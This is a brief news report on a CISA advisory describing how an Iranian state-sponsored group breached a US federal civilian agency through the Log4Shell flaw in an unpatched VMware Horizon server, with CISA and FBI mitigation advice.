The U.S. CISA disclosed that an Iranian government-sponsored APT group hacked the Federal Civilian Executive Branch.
The breach, which dates to February, was first detected in mid-June, and CISA conducted an incident response engagement with the FCEB through mid-July.
The Iranian hackers gained access to the network through an unpatched VMware Horizon server using the Log4Shell vulnerability. The FTC, a member of FECB was threatened in January that it would take legal action against companies that did not patch the vulnerability.
Once after gaining access, they installed the XMRig crypto-mining software, moved laterally to the domain controller, compromised credentials and then installed reverse proxies on several hosts to maintain persistence.
CISA had previously warned on June 23 that malicious cyber actors were continuing to exploit Log4Shell in VMware Horizon systems, but it was unknown at the time that it was specifically referring to the FCEB being hacked. The warning came days after they would have found that the FCEB had been compromised.
CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat-hunting activities.
If suspected initial access or compromise is detected based on indicators of compromise or tactics, techniques and procedures described in this Cybersecurity Advisory, CISA and FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems and audit privileged accounts